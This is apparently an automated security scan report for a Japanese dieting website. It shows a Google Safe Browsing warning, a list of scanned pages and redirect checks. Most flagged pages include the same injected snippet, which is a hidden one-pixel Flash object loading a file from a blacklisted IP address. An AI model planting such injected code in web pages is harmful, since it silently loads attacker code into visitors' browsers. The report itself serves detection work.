Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=byutipuri.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://byutipuri.com/ | 200 OK Content-Length: 38779 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3705 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/Ajax/js/prototype.js | 200 OK Content-Length: 96046 Content-Type: application/x-javascript | clean |
http://byutipuri.com/Ajax/js/prototype_add.js | 200 OK Content-Length: 2583 Content-Type: application/x-javascript | clean |
http://byutipuri.com/Ajax/js/rakuten/rakuten.js | 200 OK Content-Length: 1509 Content-Type: application/x-javascript | clean |
http://byutipuri.com/%e3%82%a6%e3%82%a9%e3%83%bc%e3%82%ad%e3%83%b3%e3%82%b0%ef%bc%86%e3%82%b8%e3%83%a7%e3%82%ae%e3%83%b3%e3%82%b0%e3%80%80%e3%83%80%e3%82%a4%e3%82%a8%e3%83%83%e3%83%8854%e5%91%a8%e7%9b%ae-91.html | 200 OK Content-Length: 158179 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3633 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/category/%e3%83%80%e3%82%a4%e3%82%a8%e3%83%83%e3%83%88%e6%83%85%e5%a0%b1 | 200 OK Content-Length: 28833 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3689 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/%e9%87%8e%e8%8f%9c%e3%82%b9%e3%83%bc%e3%83%97%e3%83%80%e3%82%a4%e3%82%a8%e3%83%83%e3%83%88%e3%81%a8%e3%81%af-81.html | 200 OK Content-Length: 28896 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3633 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/category/%e3%82%b9%e3%83%bc%e3%83%97%e3%83%80%e3%82%a4%e3%82%a8%e3%83%83%e3%83%88 | 200 OK Content-Length: 30335 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3679 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/%e8%83%8c%e4%b8%ad%e3%81%ae%e8%84%82%e8%82%aa%e3%82%92%e8%90%bd%e3%81%a8%e3%81%99%e3%81%ab%e3%81%af-80.html | 200 OK Content-Length: 28275 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3653 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/category/%e8%84%82%e8%82%aa | 200 OK Content-Length: 35650 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3699 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/%e8%83%8c%e4%b8%ad%e3%81%ae%e8%84%82%e8%82%aa%e3%81%ab%e6%b0%97%e3%82%92%e3%81%a4%e3%81%91%e3%82%8b-79.html | 200 OK Content-Length: 28305 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3653 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/tag/%e3%82%84%e3%81%9b%e3%82%8b%e6%83%85%e5%a0%b1 | 200 OK Content-Length: 33461 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3679 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/%e8%b1%86%e4%b9%b3%e3%81%8a%e3%81%8b%e3%82%89%e3%82%af%e3%83%83%e3%82%ad%e3%83%bc%e3%83%80%e3%82%a4%e3%82%a8%e3%83%83%e3%83%88%e3%81%ae%e8%a9%95%e4%be%a1%e3%81%af-78.html | 200 OK Content-Length: 28966 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3633 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/category/%e8%b1%86%e4%b9%b3%e3%81%8a%e3%81%8b%e3%82%89%e3%82%af%e3%83%83%e3%82%ad%e3%83%bc | 200 OK Content-Length: 30648 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3679 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://byutipuri.com/%e8%b1%86%e4%b9%b3%e3%81%8a%e3%81%8b%e3%82%89%e3%82%af%e3%83%83%e3%82%ad%e3%83%bc%e3%83%80%e3%82%a4%e3%82%a8%e3%83%83%e3%83%88-77.html | 200 OK Content-Length: 28786 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3633 bytes skipped]... var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Ð ÐвÐâРРÑÐ âÐ âÐ ÑвÐÑСÑÐ ÑвÐÑÐ â¡Ð ÑвÐÑлРÑвÐÑвââÐ ÑЧРâ¬Ð ¶СâºÐ¡â Ð ÑÐ ÑвÐÑÐ ÑÐ ÑвÐÑÐ ÑÐ ÑСâ¢Ð ÑÐ ÑЧРÑÐ âÐ âÐ ÐвÐâР--> </div> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: byutipuri.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 11:33:16 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://byutipuri.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: byutipuri.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 11:33:16 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://byutipuri.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: byutipuri.com
Referer: http://www.google.com/search?q=byutipuri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: byutipuri.com
Referer: http://www.google.com/search?q=byutipuri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.